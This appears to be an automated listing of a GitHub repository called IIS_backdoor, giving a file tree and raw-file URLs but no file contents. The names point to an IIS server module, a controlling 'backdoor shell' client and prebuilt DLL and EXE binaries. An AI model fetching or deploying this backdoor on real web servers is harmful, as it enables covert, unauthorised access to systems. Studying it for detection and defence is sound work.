├── IIS_backdoor_dll ├── IISModule.cs ├── IIS_backdoor_dll.csproj └── Properties │ └── AssemblyInfo.cs ├── IIS_backdoor_shell.sln ├── IIS_backdoor_shell ├── Form1.Designer.cs ├── Form1.cs ├── Form1.resx ├── IIS_backdoor_shell.csproj ├── IIS_backdoor_shell.csproj.user ├── Program.cs ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings └── app.config ├── README.md └── bin ├── IIS_backdoor_dll.dll ├── IIS_backdoor_shell.exe └── web.config /IIS_backdoor_dll/IISModule.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_dll/IISModule.cs -------------------------------------------------------------------------------- /IIS_backdoor_dll/IIS_backdoor_dll.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_dll/IIS_backdoor_dll.csproj -------------------------------------------------------------------------------- /IIS_backdoor_dll/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_dll/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell.sln -------------------------------------------------------------------------------- /IIS_backdoor_shell/Form1.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Form1.Designer.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell/Form1.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Form1.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell/Form1.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Form1.resx -------------------------------------------------------------------------------- /IIS_backdoor_shell/IIS_backdoor_shell.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/IIS_backdoor_shell.csproj -------------------------------------------------------------------------------- /IIS_backdoor_shell/IIS_backdoor_shell.csproj.user: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/IIS_backdoor_shell.csproj.user -------------------------------------------------------------------------------- /IIS_backdoor_shell/Program.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Program.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Properties/AssemblyInfo.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Properties/Resources.Designer.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell/Properties/Resources.resx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Properties/Resources.resx -------------------------------------------------------------------------------- /IIS_backdoor_shell/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Properties/Settings.Designer.cs -------------------------------------------------------------------------------- /IIS_backdoor_shell/Properties/Settings.settings: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/Properties/Settings.settings -------------------------------------------------------------------------------- /IIS_backdoor_shell/app.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/IIS_backdoor_shell/app.config -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/README.md -------------------------------------------------------------------------------- /bin/IIS_backdoor_dll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/bin/IIS_backdoor_dll.dll -------------------------------------------------------------------------------- /bin/IIS_backdoor_shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/bin/IIS_backdoor_shell.exe -------------------------------------------------------------------------------- /bin/web.config: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WBGlIl/IIS_backdoor/HEAD/bin/web.config --------------------------------------------------------------------------------